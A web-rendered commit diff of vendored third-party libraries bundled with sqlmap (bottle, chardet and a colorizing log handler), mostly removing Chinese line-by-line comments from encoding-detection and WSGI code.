elif self.bold in message: # bold
reset = self.reset + self.bold
else:
reset = self.reset
@ -160,23 +141,19 @@ class ColorizingStreamHandler(logging.StreamHandler):
return reset
def colorize(self, message, levelno):
# 根据日志级别给消息上色
if levelno in self.level_map and self.is_tty:
bg, fg, bold = self.level_map[levelno]
params = []
#如果背景色有效,添加背景色参数
if bg in self.color_map:
params.append(str(self.color_map[bg] + 40))
#如果前景色有效,添加前景色参数
if fg in self.color_map:
params.append(str(self.color_map[fg] + 30))
#如果需要加粗,添加加粗参数
if bold:
params.append('1')
#如果参数和消息都有效,检查消息是否有前缀(空格),并提取出来
if params and message:
if message.lstrip() != message:
prefix = re.search(r"\s+", message).group(0)
@ -190,6 +167,5 @@ class ColorizingStreamHandler(logging.StreamHandler):
return message
def format(self, record):
# 格式化日志记录
message = logging.StreamHandler.format(self, record)
return self.colorize(message, record.levelno)
return self.colorize(message, record.levelno)

1648
src/sqlmap-master/thirdparty/beautifulsoup/beautifulsoup.py vendored
View File

File diff suppressed because it is too large Load Diff

43
src/sqlmap-master/thirdparty/bottle/bottle.py vendored
Unescape View File

@ -29,12 +29,9 @@ __license__ = 'MIT'
def _cli_parse(args): # pragma: no coverage
# 导入ArgumentParser模块
from argparse import ArgumentParser
# 创建ArgumentParser对象设置程序名称和用法
parser = ArgumentParser(prog=args[0], usage="%(prog)s [options] package.module:app")
# 添加参数
opt = parser.add_argument
opt("--version", action="store_true", help="show version number.")
opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
@ -48,7 +45,6 @@ def _cli_parse(args): # pragma: no coverage
opt("--reload", action="store_true", help="auto-reload on file changes.")
opt('app', help='WSGI app entry point.', nargs='?')
# 解析命令行参数
cli_args = parser.parse_args(args[1:])
return cli_args, parser
@ -183,9 +179,7 @@ def depr(major, minor, cause, fix):
def makelist(data): # This is just too handy
# 判断data是否为元组、列表、集合或字典类型
if isinstance(data, (tuple, list, set, dict)):
# 如果是则返回data的列表形式
return list(data)
elif data:
return [data]
@ -204,24 +198,18 @@ class DictProperty(object):
self.getter, self.key = func, self.key or func.__name__
return self
# 如果obj为None则返回self
def __get__(self, obj, cls):
# 获取属性名和存储对象
if obj is None: return self
# 如果属性名不在存储对象中则调用getter方法获取值并存储
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
# 如果属性是只读的则抛出AttributeError异常
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
# 如果属性是只读的则抛出AttributeError异常
if self.read_only: raise AttributeError("Read-Only property.")
# 从存储对象中删除对应的值
del getattr(obj, self.attr)[self.key]
@ -749,38 +737,26 @@ class Bottle(object):
self.route('/' + '/'.join(segments), **options)
def _mount_app(self, prefix, app, **options):
# 检查app是否已经被挂载或者app的config中是否已经存在'_mount.app'键
if app in self._mounts or '_mount.app' in app.config:
# 如果app已经被挂载或者app的config中已经存在'_mount.app'键则发出警告并回退到WSGI挂载
depr(0, 13, "Application mounted multiple times. Falling back to WSGI mount.",
"Clone application before mounting to a different location.")
return self._mount_wsgi(prefix, app, **options)
# 检查options是否为空
if options:
# 如果options不为空则发出警告并回退到WSGI挂载
depr(0, 13, "Unsupported mount options. Falling back to WSGI mount.",
"Do not specify any route options when mounting bottle application.")
return self._mount_wsgi(prefix, app, **options)
# 检查prefix是否以'/'结尾
if not prefix.endswith("/"):
# 如果prefix不以'/'结尾则发出警告并回退到WSGI挂载
depr(0, 13, "Prefix must end in '/'. Falling back to WSGI mount.",
"Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.")
return self._mount_wsgi(prefix, app, **options)
# 将app添加到_mounts列表中
self._mounts.append(app)
# 将prefix添加到app的config中
app.config['_mount.prefix'] = prefix
# 将self添加到app的config中
app.config['_mount.app'] = self
# 遍历app的routes
for route in app.routes:
# 将route的rule修改为prefix + route.rule.lstrip('/')
route.rule = prefix + route.rule.lstrip('/')
# 将修改后的route添加到self的routes中
self.add_route(route)
def mount(self, prefix, app, **options):
@ -805,15 +781,11 @@ class Bottle(object):
parent application.
"""
# 检查prefix是否以'/'开头
if not prefix.startswith('/'):
# 如果prefix不以'/'开头则抛出ValueError异常
raise ValueError("Prefix must start with '/'")
# 如果app是Bottle实例则调用_mount_app方法
if isinstance(app, Bottle):
return self._mount_app(prefix, app, **options)
# 否则调用_mount_wsgi方法
else:
return self._mount_wsgi(prefix, app, **options)
@ -1117,46 +1089,31 @@ class Bottle(object):
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
# 将environ传递给_handle方法获取返回值
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
# 如果返回的状态码是100, 101, 204, 304或者请求方法是HEAD则关闭输出流
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
# 获取environ中的bottle.exc_info
exc_info = environ.get('bottle.exc_info')
# 如果有异常信息则删除environ中的bottle.exc_info
if exc_info is not None:
del environ['bottle.exc_info']
# 调用start_response方法设置响应状态行、响应头和异常信息
start_response(response._wsgi_status_line(), response.headerlist, exc_info)
# 返回输出流
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
# 如果捕获到KeyboardInterrupt, SystemExit, MemoryError异常则抛出
raise
except Exception as E:
# 如果没有开启catchall则抛出异常
if not self.catchall: raise
# 构造错误页面
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
# 如果开启了DEBUG模式则输出错误信息和堆栈信息
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(E)), html_escape(format_exc()))
# 将错误页面写入environ中的wsgi.errors
environ['wsgi.errors'].write(err)
# 刷新wsgi.errors
environ['wsgi.errors'].flush()
# 设置响应头
headers = [('Content-Type', 'text/html; charset=UTF-8')]
# 调用start_response方法设置响应状态行、响应头和异常信息
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
# 返回错误页面
return [tob(err)]
def __call__(self, environ, start_response):

16
src/sqlmap-master/thirdparty/chardet/__init__.py vendored
Unescape View File

@ -15,6 +15,7 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .compat import PY2, PY3
from .universaldetector import UniversalDetector
from .version import __version__, VERSION
@ -24,28 +25,15 @@ def detect(byte_str):
"""
Detect the encoding of the given byte string.
This function uses the UniversalDetector class to determine the encoding
of a given byte string. It creates a new UniversalDetector instance,
feeds the byte string to it, and then returns the detected encoding.
:param byte_str: The byte sequence to examine.
:type byte_str: ``bytes`` or ``bytearray``
:return: The detected encoding.
"""
# Check if the input is of the correct type
if not isinstance(byte_str, bytearray):
if not isinstance(byte_str, bytes):
raise TypeError('Expected object of type bytes or bytearray, got: '
'{0}'.format(type(byte_str)))
else:
# If the input is of type bytes, convert it to bytearray
byte_str = bytearray(byte_str)
# Create a new UniversalDetector instance
detector = UniversalDetector()
# Feed the byte string to the detector
detector.feed(byte_str)
# Close the detector and return the detected encoding
return detector.close()
return detector.close()

5
src/sqlmap-master/thirdparty/chardet/big5prober.py vendored
Unescape View File

@ -32,15 +32,10 @@ from .mbcssm import BIG5_SM_MODEL
class Big5Prober(MultiByteCharSetProber):
# 初始化Big5Prober类
def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(Big5Prober, self).__init__()
# 初始化Big5编码状态机
self.coding_sm = CodingStateMachine(BIG5_SM_MODEL)
# 初始化Big5分布分析器
self.distribution_analyzer = Big5DistributionAnalysis()
# 重置Big5Prober类
self.reset()
@property

57
src/sqlmap-master/thirdparty/chardet/charsetgroupprober.py vendored
Unescape View File

@ -30,126 +30,69 @@ from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
# 初始化函数,传入语言过滤器
def __init__(self, lang_filter=None):
# 调用父类的初始化函数
super(CharSetGroupProber, self).__init__(lang_filter=lang_filter)
# 初始化活动探测器数量
self._active_num = 0
# 初始化探测器列表
self.probers = []
# 初始化最佳猜测探测器
self._best_guess_prober = None
# 重置函数
def reset(self):
# 调用父类的重置函数
super(CharSetGroupProber, self).reset()
# 重置活动探测器数量
self._active_num = 0
# 遍历探测器列表
for prober in self.probers:
# 如果探测器存在
if prober:
# 重置探测器
prober.reset()
# 设置探测器为活动状态
prober.active = True
# 活动探测器数量加一
self._active_num += 1
# 重置最佳猜测探测器
self._best_guess_prober = None
# 获取字符集名称的属性函数
@property
def charset_name(self):
# 如果最佳猜测探测器不存在
if not self._best_guess_prober:
# 调用获取置信度函数
self.get_confidence()
# 如果最佳猜测探测器仍然不存在
if not self._best_guess_prober:
# 返回None
return None
# 返回最佳猜测探测器的字符集名称
return self._best_guess_prober.charset_name
# 获取语言的属性函数
@property
def language(self):
# 如果最佳猜测探测器不存在
if not self._best_guess_prober:
# 调用获取置信度函数
self.get_confidence()
# 如果最佳猜测探测器仍然不存在
if not self._best_guess_prober:
# 返回None
return None
# 返回最佳猜测探测器的语言
return self._best_guess_prober.language
# 接收字节字符串的函数
def feed(self, byte_str):
# 遍历探测器列表
for prober in self.probers:
# 如果探测器不存在
if not prober:
# 跳过
continue
# 如果探测器不是活动状态
if not prober.active:
# 跳过
continue
# 调用探测器接收字节字符串的函数
state = prober.feed(byte_str)
# 如果探测器返回的状态不是FOUND_IT
if not state:
# 跳过
continue
# 如果探测器返回的状态是FOUND_IT
if state == ProbingState.FOUND_IT:
# 设置最佳猜测探测器为当前探测器
self._best_guess_prober = prober
# 返回当前探测器的状态
return self.state
# 如果探测器返回的状态是NOT_ME
elif state == ProbingState.NOT_ME:
# 设置探测器为非活动状态
prober.active = False
# 活动探测器数量减一
self._active_num -= 1
# 如果活动探测器数量小于等于0
if self._active_num <= 0:
# 设置当前探测器的状态为NOT_ME
self._state = ProbingState.NOT_ME
# 返回当前探测器的状态
return self.state
# 返回当前探测器的状态
return self.state
# 获取置信度的函数
def get_confidence(self):
# 获取当前探测器的状态
state = self.state
# 如果当前探测器的状态是FOUND_IT
if state == ProbingState.FOUND_IT:
# 返回0.99
return 0.99
# 如果当前探测器的状态是NOT_ME
elif state == ProbingState.NOT_ME:
# 返回0.01
return 0.01
# 初始化最佳置信度
best_conf = 0.0
# 重置最佳猜测探测器
self._best_guess_prober = None
# 遍历探测器列表
for prober in self.probers:
# 如果探测器不存在
if not prober:
# 跳过
continue
# 如果探测器不是活动状态
if not prober.active:
self.logger.debug('%s not active', prober.charset_name)
continue

10
src/sqlmap-master/thirdparty/chardet/charsetprober.py vendored
Unescape View File

@ -34,42 +34,32 @@ from .enums import ProbingState
class CharSetProber(object):
# 定义一个阈值,当检测到的字符集概率大于这个值时,认为检测成功
SHORTCUT_THRESHOLD = 0.95
def __init__(self, lang_filter=None):
# 初始化状态为检测中
self._state = None
# 设置语言过滤器
self.lang_filter = lang_filter
# 获取日志记录器
self.logger = logging.getLogger(__name__)
def reset(self):
# 重置状态为检测中
self._state = ProbingState.DETECTING
@property
def charset_name(self):
# 返回字符集名称这里返回None
return None
def feed(self, buf):
# 接收输入的缓冲区
pass
@property
def state(self):
# 返回当前状态
return self._state
def get_confidence(self):
# 返回检测到的字符集的概率这里返回0.0
return 0.0
@staticmethod
def filter_high_byte_only(buf):
# 过滤掉所有非高字节字符
buf = re.sub(b'([\x00-\x7F])+', b' ', buf)
return buf

9
src/sqlmap-master/thirdparty/chardet/codingstatemachine.py vendored
Unescape View File

@ -53,29 +53,20 @@ class CodingStateMachine(object):
encoding from consideration from here on.
"""
def __init__(self, sm):
# 初始化函数sm为传入的模型
self._model = sm
# 当前字节位置
self._curr_byte_pos = 0
# 当前字符长度
self._curr_char_len = 0
# 当前状态
self._curr_state = None
# 获取logger
self.logger = logging.getLogger(__name__)
# 重置
self.reset()
def reset(self):
# 重置函数,将当前状态设置为起始状态
self._curr_state = MachineState.START
def next_state(self, c):
# for each byte we get its class
# if it is first byte, we also get byte length
# 获取当前字节的类别
byte_class = self._model['class_table'][c]
# 如果当前状态为起始状态,则获取当前字符长度
if self._curr_state == MachineState.START:
self._curr_byte_pos = 0
self._curr_char_len = self._model['char_len_table'][byte_class]

7
src/sqlmap-master/thirdparty/chardet/compat.py vendored
Unescape View File

@ -22,20 +22,13 @@
import sys
# 判断当前Python版本是否小于3.0
if sys.version_info < (3, 0):
# 如果是Python2版本
PY2 = True
PY3 = False
# 定义base_str为str和unicode类型
base_str = (str, unicode)
# 定义text_type为unicode类型
text_type = unicode
else:
# 如果是Python3版本
PY2 = False
PY3 = True
# 定义base_str为bytes和str类型
base_str = (bytes, str)
# 定义text_type为str类型
text_type = str

33
src/sqlmap-master/thirdparty/chardet/escprober.py vendored
Unescape View File

@ -40,95 +40,62 @@ class EscCharSetProber(CharSetProber):
"""
def __init__(self, lang_filter=None):
# 初始化EscCharSetProber类
super(EscCharSetProber, self).__init__(lang_filter=lang_filter)
# 初始化编码状态机列表
self.coding_sm = []
# 如果语言过滤器包含简体中文
if self.lang_filter & LanguageFilter.CHINESE_SIMPLIFIED:
# 添加简体中文编码状态机
self.coding_sm.append(CodingStateMachine(HZ_SM_MODEL))
# 添加ISO2022CN编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022CN_SM_MODEL))
# 如果语言过滤器包含日语
if self.lang_filter & LanguageFilter.JAPANESE:
# 添加ISO2022JP编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022JP_SM_MODEL))
# 如果语言过滤器包含韩语
if self.lang_filter & LanguageFilter.KOREAN:
# 添加ISO2022KR编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022KR_SM_MODEL))
# 初始化活动状态机数量
self.active_sm_count = None
# 初始化检测到的字符集
self._detected_charset = None
# 初始化检测到的语言
self._detected_language = None
# 初始化状态
self._state = None
# 重置
self.reset()
def reset(self):
# 重置EscCharSetProber类
super(EscCharSetProber, self).reset()
# 遍历编码状态机列表
for coding_sm in self.coding_sm:
# 如果编码状态机为空,则跳过
if not coding_sm:
continue
# 设置编码状态机为活动状态
coding_sm.active = True
# 重置编码状态机
coding_sm.reset()
# 设置活动状态机数量为编码状态机列表的长度
self.active_sm_count = len(self.coding_sm)
# 设置检测到的字符集为空
self._detected_charset = None
# 设置检测到的语言为空
self._detected_language = None
@property
def charset_name(self):
# 返回检测到的字符集
return self._detected_charset
@property
def language(self):
# 返回检测到的语言
return self._detected_language
def get_confidence(self):
# 如果检测到了字符集则返回0.99否则返回0.00
if self._detected_charset:
return 0.99
else:
return 0.00
def feed(self, byte_str):
# 遍历字节字符串
for c in byte_str:
# 遍历编码状态机列表
for coding_sm in self.coding_sm:
# 如果编码状态机为空或非活动状态,则跳过
if not coding_sm or not coding_sm.active:
continue
# 获取编码状态机的下一个状态
coding_state = coding_sm.next_state(c)
# 如果状态为错误,则设置编码状态机为非活动状态,活动状态机数量减一
if coding_state == MachineState.ERROR:
coding_sm.active = False
self.active_sm_count -= 1
# 如果活动状态机数量小于等于0则设置状态为非匹配
if self.active_sm_count <= 0:
self._state = ProbingState.NOT_ME
return self.state
# 如果状态为匹配,则设置状态为匹配,设置检测到的字符集和语言
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
self._detected_charset = coding_sm.get_coding_state_machine()
self._detected_language = coding_sm.language
return self.state
# 返回状态
return self.state

31
src/sqlmap-master/thirdparty/chardet/eucjpprober.py vendored
Unescape View File

@ -34,90 +34,59 @@ from .mbcssm import EUCJP_SM_MODEL
class EUCJPProber(MultiByteCharSetProber):
# 初始化EUCJPProber类
def __init__(self):
super(EUCJPProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCJPDistributionAnalysis()
# 初始化上下文分析器
self.context_analyzer = EUCJPContextAnalysis()
# 重置
self.reset()
# 重置
def reset(self):
super(EUCJPProber, self).reset()
self.context_analyzer.reset()
# 获取字符集名称
@property
def charset_name(self):
return "EUC-JP"
# 获取语言
@property
def language(self):
return "Japanese"
# 输入字节流
def feed(self, byte_str):
for i in range(len(byte_str)):
# PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte
# 获取下一个状态
coding_state = self.coding_sm.next_state(byte_str[i])
# 如果状态为错误
if coding_state == MachineState.ERROR:
self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i)
# 设置状态为不是该字符集
self._state = ProbingState.NOT_ME
break
# 如果状态为确定
elif coding_state == MachineState.ITS_ME:
# 设置状态为确定
self._state = ProbingState.FOUND_IT
break
# 如果状态为开始
elif coding_state == MachineState.START:
# 获取当前字符长度
char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字符
if i == 0:
# 更新最后一个字符
self._last_char[1] = byte_str[0]
# 输入最后一个字符和当前字符长度到上下文分析器
self.context_analyzer.feed(self._last_char, char_len)
# 输入最后一个字符和当前字符长度到分布分析器
self.distribution_analyzer.feed(self._last_char, char_len)
else:
# 输入前一个字符和当前字符到上下文分析器
self.context_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
# 输入前一个字符和当前字符到分布分析器
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
# 更新最后一个字符
self._last_char[0] = byte_str[-1]
# 如果状态为检测中
if self.state == ProbingState.DETECTING:
# 如果上下文分析器有足够的数据,并且置信度大于阈值
if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 设置状态为确定
self._state = ProbingState.FOUND_IT
# 返回状态
return self.state
# 获取置信度
def get_confidence(self):
# 获取上下文分析器的置信度
context_conf = self.context_analyzer.get_confidence()
# 获取分布分析器的置信度
distrib_conf = self.distribution_analyzer.get_confidence()
# 返回最大置信度
return max(context_conf, distrib_conf)

7
src/sqlmap-master/thirdparty/chardet/euckrprober.py vendored
Unescape View File

@ -32,23 +32,16 @@ from .mbcssm import EUCKR_SM_MODEL
class EUCKRProber(MultiByteCharSetProber):
# 初始化EUCKRProber类
def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(EUCKRProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCKR_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCKRDistributionAnalysis()
# 重置
self.reset()
# 获取字符集名称
@property
def charset_name(self):
return "EUC-KR"
# 获取语言
@property
def language(self):
return "Korean"

7
src/sqlmap-master/thirdparty/chardet/euctwprober.py vendored
Unescape View File

@ -31,23 +31,16 @@ from .chardistribution import EUCTWDistributionAnalysis
from .mbcssm import EUCTW_SM_MODEL
class EUCTWProber(MultiByteCharSetProber):
# 初始化EUCTWProber类
def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(EUCTWProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCTW_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCTWDistributionAnalysis()
# 重置
self.reset()
# 获取字符集名称
@property
def charset_name(self):
return "EUC-TW"
# 获取语言
@property
def language(self):
return "Taiwan"

7
src/sqlmap-master/thirdparty/chardet/gb2312prober.py vendored
Unescape View File

@ -31,23 +31,16 @@ from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312_SM_MODEL
class GB2312Prober(MultiByteCharSetProber):
# 初始化GB2312Prober类
def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(GB2312Prober, self).__init__()
# 初始化GB2312编码状态机
self.coding_sm = CodingStateMachine(GB2312_SM_MODEL)
# 初始化GB2312分布分析器
self.distribution_analyzer = GB2312DistributionAnalysis()
# 重置
self.reset()
# 获取字符集名称
@property
def charset_name(self):
return "GB2312"
# 获取语言
@property
def language(self):
return "Chinese"

10
src/sqlmap-master/thirdparty/chardet/hebrewprober.py vendored
Unescape View File

@ -152,27 +152,17 @@ class HebrewProber(CharSetProber):
LOGICAL_HEBREW_NAME = "windows-1255"
def __init__(self):
# 初始化HebrewProber类
super(HebrewProber, self).__init__()
# 初始化_final_char_logical_score为None
self._final_char_logical_score = None
# 初始化_final_char_visual_score为None
self._final_char_visual_score = None
# 初始化_prev为None
self._prev = None
# 初始化_before_prev为None
self._before_prev = None
# 初始化_logical_prober为None
self._logical_prober = None
# 初始化_visual_prober为None
self._visual_prober = None
# 调用reset方法
self.reset()
def reset(self):
# 重置_final_char_logical_score为0
self._final_char_logical_score = 0
# 重置_final_char_visual_score为0
self._final_char_visual_score = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate

23
src/sqlmap-master/thirdparty/chardet/mbcharsetprober.py vendored
Unescape View File

@ -37,28 +37,17 @@ class MultiByteCharSetProber(CharSetProber):
"""
def __init__(self, lang_filter=None):
# 初始化函数传入参数lang_filter
super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter)
# 调用父类的初始化函数
self.distribution_analyzer = None
# 初始化分布分析器
self.coding_sm = None
# 初始化编码状态机
self._last_char = [0, 0]
# 初始化最后一个字符
def reset(self):
# 重置函数
super(MultiByteCharSetProber, self).reset()
# 调用父类的重置函数
if self.coding_sm:
# 如果编码状态机存在
self.coding_sm.reset()
# 重置编码状态机
if self.distribution_analyzer:
# 如果分布分析器存在
self.distribution_analyzer.reset()
# 重置分布分析器
self._last_char = [0, 0]
@property
@ -70,45 +59,33 @@ class MultiByteCharSetProber(CharSetProber):
raise NotImplementedError
def feed(self, byte_str):
# 遍历byte_str中的每个字节
for i in range(len(byte_str)):
# 获取当前字节的编码状态
coding_state = self.coding_sm.next_state(byte_str[i])
# 如果编码状态为错误则记录错误信息并将状态设置为NOT_ME
if coding_state == MachineState.ERROR:
self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i)
self._state = ProbingState.NOT_ME
break
# 如果编码状态为确定则将状态设置为FOUND_IT
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
# 如果编码状态为开始,则获取当前字符长度
elif coding_state == MachineState.START:
char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字节则将当前字节和上一个字节作为参数传入feed方法
if i == 0:
self._last_char[1] = byte_str[0]
self.distribution_analyzer.feed(self._last_char, char_len)
# 否则将当前字节和上一个字节作为参数传入feed方法
else:
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
# 将最后一个字节赋值给_last_char[0]
self._last_char[0] = byte_str[-1]
# 如果状态为DETECTING则判断是否已经获取足够的数据并且置信度是否大于SHORTCUT_THRESHOLD
if self.state == ProbingState.DETECTING:
if (self.distribution_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 如果满足条件则将状态设置为FOUND_IT
self._state = ProbingState.FOUND_IT
# 返回状态
return self.state
def get_confidence(self):
# 获取置信度
return self.distribution_analyzer.get_confidence()

20
src/sqlmap-master/thirdparty/chardet/mbcsgroupprober.py vendored
Unescape View File

@ -39,20 +39,16 @@ from .euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber):
# 初始化MBCSGroupProber类继承自CharSetGroupProber类
def __init__(self, lang_filter=None):
# 调用父类CharSetGroupProber的初始化方法
super(MBCSGroupProber, self).__init__(lang_filter=lang_filter)
# 定义一个包含多种字符集探测器的列表
self.probers = [
UTF8Prober(), # UTF-8字符集探测器
SJISProber(), # Shift_JIS字符集探测器
EUCJPProber(), # EUC-JP字符集探测器
GB2312Prober(), # GB2312字符集探测器
EUCKRProber(), # EUCKR字符集探测器
CP949Prober(), # CP949字符集探测器
Big5Prober(), # Big5字符集探测器
EUCTWProber() # EUCTW字符集探测器
UTF8Prober(),
SJISProber(),
EUCJPProber(),
GB2312Prober(),
EUCKRProber(),
CP949Prober(),
Big5Prober(),
EUCTWProber()
]
# 重置探测器
self.reset()

17
src/sqlmap-master/thirdparty/chardet/sbcharsetprober.py vendored
Unescape View File

@ -31,19 +31,13 @@ from .enums import CharacterCategory, ProbingState, SequenceLikelihood
class SingleByteCharSetProber(CharSetProber):
# 定义样本大小
SAMPLE_SIZE = 64
# 定义相对阈值
SB_ENOUGH_REL_THRESHOLD = 1024 # 0.25 * SAMPLE_SIZE^2
# 定义正向阈值
POSITIVE_SHORTCUT_THRESHOLD = 0.95
# 定义负向阈值
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
def __init__(self, model, reversed=False, name_prober=None):
# 调用父类构造函数
super(SingleByteCharSetProber, self).__init__()
# 设置模型
self._model = model
# TRUE if we need to reverse every pair in the model lookup
self._reversed = reversed
@ -57,7 +51,6 @@ class SingleByteCharSetProber(CharSetProber):
self.reset()
def reset(self):
# 重置函数
super(SingleByteCharSetProber, self).reset()
# char order of last character
self._last_order = 255
@ -76,20 +69,16 @@ class SingleByteCharSetProber(CharSetProber):
@property
def language(self):
# 如果_name_prober存在则返回_name_prober的语言否则返回_model中的语言
if self._name_prober:
return self._name_prober.language
else:
return self._model.get('language')
def feed(self, byte_str):
# 如果_model中的keep_english_letter为False则过滤掉国际字符
if not self._model['keep_english_letter']:
byte_str = self.filter_international_words(byte_str)
# 如果byte_str为空则返回状态
if not byte_str:
return self.state
# 获取字符到顺序的映射
char_to_order_map = self._model['char_to_order_map']
for i, c in enumerate(byte_str):
# XXX: Order is in range 1-64, so one would think we want 0-63 here,
@ -133,17 +122,11 @@ class SingleByteCharSetProber(CharSetProber):
return self.state
def get_confidence(self):
# 初始化r为0.01
r = 0.01
# 如果总序列数大于0
if self._total_seqs > 0:
# 计算r的值
r = ((1.0 * self._seq_counters[SequenceLikelihood.POSITIVE]) /
self._total_seqs / self._model['typical_positive_ratio'])
# 乘以字符频率和总字符数
r = r * self._freq_char / self._total_char
# 如果r大于等于1.0则将r设置为0.99
if r >= 1.0:
r = 0.99
# 返回r的值
return r

35
src/sqlmap-master/thirdparty/chardet/sjisprober.py vendored
Unescape View File

@ -34,94 +34,59 @@ from .enums import ProbingState, MachineState
class SJISProber(MultiByteCharSetProber):
# 初始化函数
def __init__(self):
# 调用父类的初始化函数
super(SJISProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(SJIS_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = SJISDistributionAnalysis()
# 初始化上下文分析器
self.context_analyzer = SJISContextAnalysis()
# 重置分析器
self.reset()
# 重置函数
def reset(self):
# 调用父类的重置函数
super(SJISProber, self).reset()
# 重置上下文分析器
self.context_analyzer.reset()
@property
def charset_name(self):
# 返回字符集名称
return self.context_analyzer.charset_name
@property
def language(self):
# 返回语言
return "Japanese"
def feed(self, byte_str):
# 遍历字节字符串
for i in range(len(byte_str)):
# 获取下一个状态
coding_state = self.coding_sm.next_state(byte_str[i])
# 如果状态为错误
if coding_state == MachineState.ERROR:
# 记录错误日志
self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i)
# 设置状态为不是该字符集
self._state = ProbingState.NOT_ME
break
# 如果状态为确定
elif coding_state == MachineState.ITS_ME:
# 设置状态为确定
self._state = ProbingState.FOUND_IT
break
# 如果状态为开始
elif coding_state == MachineState.START:
# 获取当前字符长度
char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字符
if i == 0:
# 更新最后一个字符
self._last_char[1] = byte_str[0]
# 向上下文分析器输入字符
self.context_analyzer.feed(self._last_char[2 - char_len:],
char_len)
# 向分布分析器输入字符
self.distribution_analyzer.feed(self._last_char, char_len)
else:
# 向上下文分析器输入字符
self.context_analyzer.feed(byte_str[i + 1 - char_len:i + 3
- char_len], char_len)
# 向分布分析器输入字符
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
# 更新最后一个字符
self._last_char[0] = byte_str[-1]
# 如果状态为检测中
if self.state == ProbingState.DETECTING:
# 如果上下文分析器有足够的数据,并且置信度大于阈值
if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 设置状态为确定
self._state = ProbingState.FOUND_IT
# 返回状态
return self.state
# 获取置信度
def get_confidence(self):
# 获取上下文分析器的置信度
context_conf = self.context_analyzer.get_confidence()
# 获取分布分析器的置信度
distrib_conf = self.distribution_analyzer.get_confidence()
# 返回上下文置信度和分布置信度中的最大值
return max(context_conf, distrib_conf)

19
src/sqlmap-master/thirdparty/chardet/universaldetector.py vendored
Unescape View File

@ -79,27 +79,16 @@ class UniversalDetector(object):
'iso-8859-13': 'Windows-1257'}
def __init__(self, lang_filter=LanguageFilter.ALL):
# 初始化语言过滤器
self._esc_charset_prober = None
# 初始化字符集探测器
self._charset_probers = []
# 初始化结果
self.result = None
# 初始化完成标志
self.done = None
# 初始化是否获取数据标志
self._got_data = None
# 初始化输入状态
self._input_state = None
# 初始化最后一个字符
self._last_char = None
# 设置语言过滤器
self.lang_filter = lang_filter
# 获取日志记录器
self.logger = logging.getLogger(__name__)
# 初始化是否包含Windows字节标志
self._has_win_bytes = None
# 重置
self.reset()
def reset(self):
@ -108,22 +97,14 @@ class UniversalDetector(object):
initial states. This is called by ``__init__``, so you only need to
call this directly in between analyses of different documents.
"""
# 重置结果
self.result = {'encoding': None, 'confidence': 0.0, 'language': None}
# 重置完成标志
self.done = False
# 重置是否接收到数据标志
self._got_data = False
# 重置是否有win字节标志
self._has_win_bytes = False
# 重置输入状态
self._input_state = InputState.PURE_ASCII
# 重置最后一个字符
self._last_char = b''
# 如果有esc字符集探测器重置它
if self._esc_charset_prober:
self._esc_charset_prober.reset()
# 重置所有字符集探测器
for prober in self._charset_probers:
prober.reset()

25
src/sqlmap-master/thirdparty/chardet/utf8prober.py vendored
Unescape View File

@ -33,75 +33,50 @@ from .mbcssm import UTF8_SM_MODEL
class UTF8Prober(CharSetProber):
# 定义一个常量表示一个字符的初始概率为0.5
ONE_CHAR_PROB = 0.5
# 初始化函数
